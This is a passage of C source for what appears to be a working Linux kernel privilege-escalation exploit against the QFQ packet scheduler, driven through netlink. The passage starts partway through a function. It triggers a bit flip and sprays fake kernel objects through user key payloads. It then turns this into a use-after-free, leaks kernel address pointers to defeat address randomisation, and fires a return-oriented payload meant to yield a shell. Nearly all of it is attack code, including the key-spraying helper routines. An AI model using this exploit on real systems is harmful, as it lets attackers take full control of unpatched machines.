  const u32 sub_handle_oob = 0x20020000;

  const int loindex = if_nametoindex("lo");

  int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  FAIL_IF(s < 0);

  struct sockaddr_nl addr = {0};
  addr.nl_family = AF_NETLINK;

  FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0);

  if (prepare_device(s, loindex) < 0) {
    return -1;
  }

  // Prepare qfq qdisc without anything else.
  // Eventually we will create everything of interest when we pull the trigger.
  // Until that this qdisc serves as some kind of "grooming" object
  // Note that this qdisc is created with a specifically chosen TCA_STAB
  // so that we can trigger the vulnerability.
  if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 1) < 0) {
    return -1;
  }

  EVENT_SET(parent_notify);

  while (!done) {
    while (wake != i) {
      sleep(1);
    }
    wake = 0;

    L("worker %d is entering stage 1: trigger vulnerability", i);

    L("trying to prepare helper class ..");
    // This is a real helper class: We use it to make the code below follow
    // certain paths in sch_qfq.c
    // We require the following:
    //  - qfq_sch->in_serv_agg != NULL
    //  - qfq_sch->in_serv_agg != OOB agg
    // We use a netem qdisc with a large delay to consistently hit the window
    // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset.
    if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) {
      E("failed to create helper class :(");
      return -1;
    }

    L("trying to prepare oob class ..");
    // Class which will carry the aggregate with the OOB group
    // In order to hit the desired update code paths, this class needs
    // packets in its (sub)qdisc. Additionally we ideally want to drop the
    // packet that causes the OOB group to be created.
    // We use the same netem qdisc for this, additionally the netem qdisc will
    // have a limit of 1 dropping all packets after the first one.
    if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) {
      E("failed to create oob class :(");
      return -1;
    }

    L("activating helper agg ..");
    u8 buf[1 << 9] = {0};

    int sc, ss;
    struct sockaddr_in addr;
    u32 addr_len;

    ss = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(ss < 0);
    sc = socket(AF_INET, SOCK_DGRAM, 0);
    FAIL_IF(sc < 0);

    addr.sin_family = AF_INET;
    addr.sin_port = 0;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    addr_len = sizeof(addr);

    FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0);
    FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0)

    // set in_serv_agg = helper agg
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    // make (not-yet) oob class active
    FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0);
    FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    L("spraying some fake qfq_aggregate ..");
    prep_agg_payload(&agg.agg, 0x10000000000001, 0x1337);
    FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0);

    // trigger vulnerability
    // note that this packet will be dropped by the child (netem) qdisc
    FAIL_IF(sendto(sc, buf, 1 << 9, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0);

    L("spraying some more fake qfq_aggregate ..");
    FAIL_IF(spray(SPRAY_128, ATTEMPT_SMALL_EVERY, &agg, sizeof(agg)) < 0);

    close(ss);
    close(sc);

    L("waking parent");
    EVENT_SET(parent_notify);

    while (wake != i) {
      sleep(1);
    }
    wake = 0;

    // At this stage the vulnerability should have flipped a bit of qfq_sch->nonfull_aggs
    // pointing to one of our fake aggregates sprayed above.
    // We will now try to create a class using this fake aggregate.
    // This will eventually allow us to reach a UaF scenario.
    L("worker %d is entering stage 2: smuggle a fake aggregate", i);

    L(" trying to create class using the fake aggregate ..");
    if (create_helper_class(s, loindex, handle_faked1, 0, 0x1337) != 0) {
      return -1;
    }

    L("waking parent");
    EVENT_SET(parent_notify);

    while (wake != i) {
      sleep(1);
    }
    wake = 0;

    L("worker %d is entering stage 3: trigger UaF", i);
    if (delete_class(s, loindex, handle_faked1) != 0) {
      return -1;
    }

    L("waking parent");
    EVENT_SET(parent_notify);

    while (!done) {
      sleep(1);
    }
  }

  return 0;
}

// Final stage worker which will spray tcf_proto payloads and hopefully trigger
// the one which gives us a shell
int final_stage_worker(void* arg) {
  const int loindex = if_nametoindex("lo");
  const u32 handle = 0x30000000;
  int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  FAIL_IF(s < 0);

  {
    struct sockaddr_nl addr = {0};
    addr.nl_family = AF_NETLINK;
    FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0);
  }

  FAIL_IF(prepare_device(s, loindex) < 0);
  // We want any qdisc here to attach the filters to, just re-use some code
  FAIL_IF(create_qfq_qisc(s, loindex, TC_H_ROOT, handle, 0) < 0);

  EVENT_SET(parent_notify);

  sleep(1);
  EVENT_WAIT(final_worker_notify);

  // We freed the fake qfq_aggregate (for which we have a key handle id_agg)
  // Try to reclaim it using tcf_proto s
  // We use rsvp filters, see below.
  L("spraying tcf_proto ..");
  for (int i = 0; i < 80; i++) {
    FAIL_IF(create_tcfilter(s, loindex, handle, 0x1000 + i) != 0);
  }

  // So this is a bit sketchy. keyctl_read will not copy the buffer
  // if the size does not match. This will force us to copy a HUGE
  // amount of memory which hopefully does not fault :(
  // This actually is a problem on the mitigation instance (presumably because
  // of the CONFIG_SLAB_VIRTUAL). To circumvent this problem we choose
  // a filter which has a very "low" address for its classify operation
  // (tcf_proto->classify overlaps the length field of our key)
  // "rsvp_classify" is the lowest I could find
  FAIL_IF(read_key(id_agg, &agg, sizeof(agg)) < 0);

  leak_cls_rsvp_ops = (u64)agg.tp.ops;
  L("leaked kaslr pointer (cls_rsvp_ops): %p", (void*)leak_cls_rsvp_ops);

  if ((leak_cls_rsvp_ops & 0xFFFF000000000000) != 0xFFFF000000000000) {
    E("leak looks incorrect :(");
    return -1;
  }

  i64 diff = cls_rsvp_ops - leak_cls_rsvp_ops;
  L("diff: %lld", diff);

  #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); }
  FOR_ALL_OFFSETS(__x);
  #undef __x

  prep_tcf_proto_payload(&agg);
  prep_final_large_payload(&large);

  struct key saved[] = {
    {
      .id = id_large,
      .type = -1,
    }
  };
  FAIL_IF(spray_reset_except(saved, 1));

  int spray_small = 1;
  int spray_large = 1;
retry:
  if (spray_small) {
    struct key saved[] = {
      {
        .id = -1,
        .type = SPRAY_8192,
      }
    };

    // Free the tcf_proto and reclaim it with a fake one
    FAIL_IF(spray_reset_except(saved, 1));
    FAIL_IF(spray(SPRAY_128, 50, &agg, sizeof(agg)));
    spray_small = 0;

    sleep(1);
  }

  if (spray_large) {
    struct key saved[] = {
      {
        .id = -1,
        .type = SPRAY_128,
      }
    };
    // Free the 8192 large key object and reclaim it with a prepared ROP payload
    FAIL_IF(spray_reset_except(saved, 1));
    FAIL_IF(spray(SPRAY_8192, 2, &large, sizeof(large)));
    spray_large = 0;
  }

  // Final trigger ..
  {
    struct nlmsghdr* nlh = calloc(1, 4096);
    struct tcmsg* data = NLMSG_DATA(nlh);
    nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
    nlh->nlmsg_type = RTM_GETTFILTER;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_seq = 0;
    nlh->nlmsg_pid = 0;

    data->tcm_family = PF_UNSPEC;
    data->tcm_ifindex = loindex;
    data->tcm_parent = handle;
    data->tcm_handle = 0;

    u16 protocol = 0xdead;
    data->tcm_info = ((u32)0x2222 << 16) | (u32)protocol;

    struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
    do {
      attr->nla_type = TCA_KIND;
      attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("exploit") + 1);

      char* attr_data = (char*)attr + NLA_HDRLEN;
      strcpy(attr_data, "exploit");

      nlh->nlmsg_len += attr->nla_len;
      attr = (void*)attr + attr->nla_len;
    } while (0);

    int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
    if (recvlen < 0) {
      perror("recv()");
      free(nlh);
      return -1;
    }

    int err = netlink_errno(s, nlh);

    // This sometimes shows EBUSY, but it still works?
    // We just ignore the error, ...
    if (err != -EBUSY && err != 0) {
      E("failed to trigger payload ..");

      // We have a small side-channel leak here, which makes the last step
      // relatively stable:
      // If the spray of fake tcf_proto failed, we will not find a suitable
      // filter with the requested priority, thus kernel will return -ENOENT
      // If the spray of the large prepared stack failed, the name of kind
      // will be all zeros, thus not matching the requested "exploit" kind,
      // thus kernel will return -EINVAL

      if (err == -ENOENT) {
        L("retrying small spray ..");
        spray_small = 1;
        goto retry;
      }
      if (err == -EINVAL) {
        L("retrying large spray ..");
        spray_large = 1;
        goto retry;
      }
      E("failed :(");
      free(nlh);
      return -1;
    }

    free(nlh);
  }

  return 0;
}

int main() {
  // main orchestration routine.
  // mainly manages workers and occasionally collects leak information

  FAIL_IF(_pin_to_cpu(0) != 0);

  scratch_buf = calloc(16, 0x1000);
  FAIL_IF(scratch_buf == NULL);

  int worker_i = 1;
  int ki;
  const struct key* key;
  prep_stage1_large_payload(&large);
  for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY*3; worker_i++) {
    int do_the_thing = (worker_i % ATTEMPT_LARGE_EVERY == 0);

    if (do_the_thing && DO_BEFORE > 0) {
      FAIL_IF(spray(SPRAY_8192, DO_BEFORE, &large, sizeof(large)) != 0);
    }

    FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0);
    EVENT_WAIT(parent_notify);

    if (do_the_thing) {
      FAIL_IF(spray(SPRAY_8192, 3 - DO_BEFORE, &large, sizeof(large)) != 0);

      wake = worker_i;
      EVENT_WAIT(parent_notify);

      ki = 0;
      while ((key = get_key(ki++)) != NULL) {
        if (key->type != SPRAY_8192) {
          continue;
        }

        FAIL_IF(read_key(key->id, &large, sizeof(large)) < 0);
        for (int k = 0; k < ARRAY_LEN(large.group.slots); k++) {
          leak_agg_ptr = (u64)large.group.slots[k].first;
          if (leak_agg_ptr != 0) {
            if ((leak_agg_ptr & 0x80) != 0) {
              // This is the bit we flipped. If it was already set, try again.
              // At this point we should be relatively stable (TM)

              E("we succeeded, but the qfq_aggregate pointer had the wrong bit set: %p", (void*)leak_agg_ptr);
              break;
            }

            id_large = key->id;
            goto stage2;
          }
        }
      }

      E("attempt failed. trying again ..");
      prep_stage1_large_payload(&large);
      FAIL_IF(spray_reset());
    }
  }

  goto failed;

stage2:
  L("leaked struct qfq_aggregate heap pointer: %p", (void*)leak_agg_ptr);

  wake = worker_i;
  EVENT_WAIT(parent_notify);

  ki = 0;
  while ((key = get_key(ki++)) != NULL) {
    if (key->type != SPRAY_128) {
      continue;
    }

    FAIL_IF(read_key(key->id, &agg, sizeof(agg)) < 0);

    if (agg.agg.grp != NULL) {
      leak_grp_ptr = (u64)agg.agg.grp;
      id_agg = key->id;
      break;
    }
  }

  if (leak_grp_ptr == 0) {
    E("we failed to get the grp pointer?");
    goto failed;
  }

  // offsetof(Qdisc, group assigned to agg) + 8192 because the overflowed page is right behind the qdisc.
  leak_grp_ptr = (leak_grp_ptr - 5816) + 8192;
  L("leaked key payload 8192 pointer: %p", (void*)leak_grp_ptr);

  // stage 3

  // it seems we are not allowed to create a new netns here?
  // just move it to a new child ..
  FAIL_IF(spawn_worker(&final_stage_worker, NULL) < 0);
  EVENT_WAIT(parent_notify);

  wake = worker_i;

  EVENT_WAIT(parent_notify);
  EVENT_SET(final_worker_notify);

  while (1) {
    sleep(100);
  }

failed:
  E("we failed .(");
  spray_exit();
  while (last_worker > 0) {
    kill_worker(last_worker - 1);
  }
  return 0;
}

/**
 * Key payload spraying helper routines.
 *
 * Spraying is a little complicated because of the quota restrictions on sprayed keys and our multi process architecture.
 *
 * We will fork into a child process which will allocate all the keys.
 * This process will own all the keys saving us the troubles of key permissions.
 * The cost is additional complexity here. All the keyctl syscalls are essentially proxied through to the child process.
*/

inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) {
  return syscall(__NR_add_key, type, description, payload, plen, ringid);
}

long __keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
    return syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5);
}

struct spray_info {
  int num_keys;
  struct key* keys;
};

enum {
  CMD_spray_keys = 0,
  CMD_reset_keys = 1,
  CMD_keyctl = 2,
  CMD_stop = 3,
};

struct shm {
  int target;
  union {
    struct {
      int type;
      void* payload;
      size_t plen;
      int n;
    } add_args;
    struct {
      int option;
      unsigned long args[4];
    } keyctl_args;
    struct {
      const key_serial_t* except;
    } reset_except_args;
  } u;
  int err;

  int event_begin;
  int event_end;
};

struct helper {
  void* stack;
  int pid;
};

static struct spray_info info = {
  .num_keys = 0,
  .keys = NULL,
};

static struct helper helper = {
  .stack = NULL,
  .pid = 0,
};

static struct shm shm = {
  .target = 0,
  .err = 0,
  .event_begin = __EVENT_UNSET,
  .event_end = __EVENT_UNSET,
};

static int spray_buffers(int type, void* payload, size_t plen, int n) {
  char desc[32] = {0};
  info.keys = (struct key*)reallocarray(info.keys, n + info.num_keys, sizeof(struct key));
  if (info.keys == NULL) {
    return -1;
  }

  for (int i = 0; i < n; i++) {
    int j = info.num_keys;

    snprintf(desc, sizeof(desc) - 1, "%d-%d", type, j);

    info.keys[j].type = type;
    info.keys[j].id = add_key("user", desc, payload, plen, KEY_SPEC_PROCESS_KEYRING);

    if (info.keys[j].id == -1) {
      return -1;
    }

    info.num_keys ++;
  }

  return 0;
}

static int spray_worker(void* unused) {
  int ret;

  while (1) {
    EVENT_WAIT(shm.event_begin);

    shm.err = -1;
    switch (shm.target) {
    case CMD_spray_keys: {
      int type = shm.u.add_args.type;
      void* payload = shm.u.add_args.payload;
      size_t plen = shm.u.add_args.plen;
      int n = shm.u.add_args.n;

      shm.err = spray_buffers(type, payload, plen, n);
      break;
    }
    case CMD_reset_keys:
      shm.err = 0;
      while (info.num_keys > 0) {
        int i = info.num_keys - 1;

        if (info.keys[i].id >= 0) {
          if (__keyctl(KEYCTL_REVOKE, info.keys[i].id, 0, 0, 0) < 0) {
            shm.err = -1;
            break;
          }
        }

        info.num_keys --;
      }
      break;
    case CMD_keyctl:
      shm.err = __keyctl(shm.u.keyctl_args.option,
        shm.u.keyctl_args.args[0],
        shm.u.keyctl_args.args[1],
        shm.u.keyctl_args.args[2],
        shm.u.keyctl_args.args[3]);
      break;
    case CMD_stop:
      goto exit;
    default:
      break;
    }

    EVENT_SET(shm.event_end);
  }

exit:
  EVENT_SET(shm.event_end);
  return 0;
}

static int ensure_helper() {
  if (helper.pid <= 0) {
    if (helper.stack == NULL) {
      void* stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
      FAIL_IF(stack == MAP_FAILED);
      helper.stack = stack;
    }

    helper.pid = clone(&spray_worker, (char*)helper.stack + 0x4000, CLONE_VM, NULL);
    FAIL_IF(helper.pid < 0);
  }

  return 0;
}

int spray(int type, int n, void* payload, size_t plen) {
  shm.u.add_args.type = type;
  shm.u.add_args.payload = payload;
  shm.u.add_args.plen = plen;
  shm.u.add_args.n = n;

  FAIL_IF(ensure_helper() != 0);

  shm.target = CMD_spray_keys;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  return shm.err;
}

int spray_reset() {
  FAIL_IF(ensure_helper() != 0);

  shm.target = CMD_reset_keys;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  return shm.err;
}

int spray_reset_except(struct key *ids, size_t num_ids) {
  FAIL_IF(ensure_helper() != 0);

  struct key* tmp = calloc(info.num_keys, sizeof(struct key));
  FAIL_IF(tmp == NULL);

  int num_saved = 0;
  for (int i = 0; i < info.num_keys; i++) {
    for (int j = 0; j < num_ids; j++) {
      if (info.keys[i].id == ids[j].id || info.keys[i].type == ids[j].type) {
        tmp[num_saved] = info.keys[i];
        num_saved++;

        info.keys[i] = info.keys[info.num_keys - 1];
        info.num_keys--;
        i--;
        break;
      }
    }
  }

  shm.target = CMD_reset_keys;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  free(info.keys);
  info.keys = tmp;
  info.num_keys = num_saved;

  return shm.err;
}

int spray_exit() {
  FAIL_IF(ensure_helper() != 0);

  shm.target = CMD_stop;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  sleep(1);
  munmap(helper.stack, 0x4000);
  helper.pid = -1;

  return shm.err;
}

const struct key* get_key(unsigned index) {
  if (index >= info.num_keys) {
    return NULL;
  }

  return &info.keys[index];
}


long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
  FAIL_IF(ensure_helper() != 0);

  shm.u.keyctl_args.option = option;
  shm.u.keyctl_args.args[0] = arg2;
  shm.u.keyctl_args.args[1] = arg3;
  shm.u.keyctl_args.args[2] = arg4;
  shm.u.keyctl_args.args[3] = arg5;

  shm.target = CMD_keyctl;
  EVENT_SET(shm.event_begin);
  EVENT_WAIT(shm.event_end);

  return shm.err;
}
